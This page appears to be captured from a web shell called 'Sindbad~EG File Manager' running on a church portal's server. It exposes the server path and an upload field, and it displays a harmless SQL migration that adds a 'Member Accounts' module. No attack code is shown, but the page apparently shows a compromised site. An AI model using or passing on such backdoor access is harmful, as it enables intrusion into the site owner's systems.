Sindbad~EG File Manager

Current Path : /home/copmadinaarea/thecopmadinaarea.org/portal/sql/
Upload File :
Current File : /home/copmadinaarea/thecopmadinaarea.org/portal/sql/add_member_accounts_module.sql

-- Add Member Accounts module to the system (before Reports)
INSERT INTO module_management (module_name, module_url, module_icon, is_active, display_order, required_role) 
VALUES ('Member Accounts', 'modules/member-accounts/index.php', 'users-cog', 1, 6, 'area') 
ON DUPLICATE KEY UPDATE 
    module_name = VALUES(module_name),
    module_url = VALUES(module_url),
    module_icon = VALUES(module_icon),
    is_active = VALUES(is_active),
    display_order = VALUES(display_order),
    required_role = VALUES(required_role);

-- Update Reports module display order to 7 (after Member Accounts)
UPDATE module_management SET display_order = 7 WHERE module_name = 'Reports' OR module_url LIKE '%reports%';

Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists